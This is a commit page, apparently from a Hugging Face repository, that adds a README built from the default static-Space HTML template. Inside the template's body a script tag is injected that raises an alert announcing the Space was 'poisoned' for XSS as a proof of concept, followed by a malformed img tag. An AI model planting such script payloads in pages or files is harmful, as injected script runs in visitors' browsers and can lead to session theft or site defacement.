datoto9019
commited on
Create README.md
Browse files
README.md
ADDED
@@ -0,0 +1,26 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
---
|
2 |
+
new_version: black-forest-labs/FLUX.1-dev
|
3 |
+
---
|
4 |
+
<!doctype html>
|
5 |
+
<html>
|
6 |
+
<head>
|
7 |
+
<meta charset="utf-8" />
|
8 |
+
<meta name="viewport" content="width=device-width" />
|
9 |
+
<title>My static Space</title>
|
10 |
+
<link rel="stylesheet" href="style.css" />
|
11 |
+
</head>
|
12 |
+
<body>
|
13 |
+
<div class="card">
|
14 |
+
<h1>Welcome to your static Space!</h1>
|
15 |
+
<script>alert('This Space Was Poisoned By Thee Eclipse for XSS as a POC')</script>
|
16 |
+
>img src=x>
|
17 |
+
|
18 |
+
<p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
|
19 |
+
<p>
|
20 |
+
Also don't forget to check the
|
21 |
+
<a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
|
22 |
+
|
23 |
+
</p>
|
24 |
+
</div>
|
25 |
+
</body>
|
26 |
+
</html>
|